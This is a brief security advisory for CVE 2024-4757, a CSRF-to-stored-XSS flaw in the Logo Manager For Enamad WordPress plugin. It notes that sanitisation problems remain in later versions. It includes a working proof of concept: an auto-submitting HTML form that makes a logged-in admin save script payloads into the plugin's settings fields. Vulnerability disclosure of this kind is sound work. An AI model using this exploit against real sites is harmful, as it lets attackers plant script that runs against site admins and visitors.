Logo Manager For Enamad < 0.7.1 – Stored XSS via CSRF | CVE 2024-4757

Description

The plugin does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.

Note: The CSRF has been fixed in 0.7.1, however the lack of sanitization in the settings in still present (latest tested in 0.7.4), especially in Multisite setup

Proof of Concept

Make a logged in admin open an HTML file containing:


```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/options-general.php?page=enamadlogo-options" method="POST"> 
        <input type="hidden" name="enamad-enable" value="1">
          <input type="hidden" name="enamad-width" value="125">
          <input type="hidden" name="enamad-position" value="bottom-left">
          <input type="hidden" name="enamad-view-method" value="front-page">
          <input type="hidden" name="enamad-code" value="1">
          <input type="hidden" name="enamad-shamed-code" value="</textarea><script>alert(/XSS: enamad-code/)</script>">
          <input type="hidden" name="enamad-custom-code" value="</textarea><script>alert(/XSS: enamad-custom-code/)</script>">
          <input type="hidden" name="enamad-submit" value="ثبت">
        <input type="submit" value="submit">
    </form>
</body>
```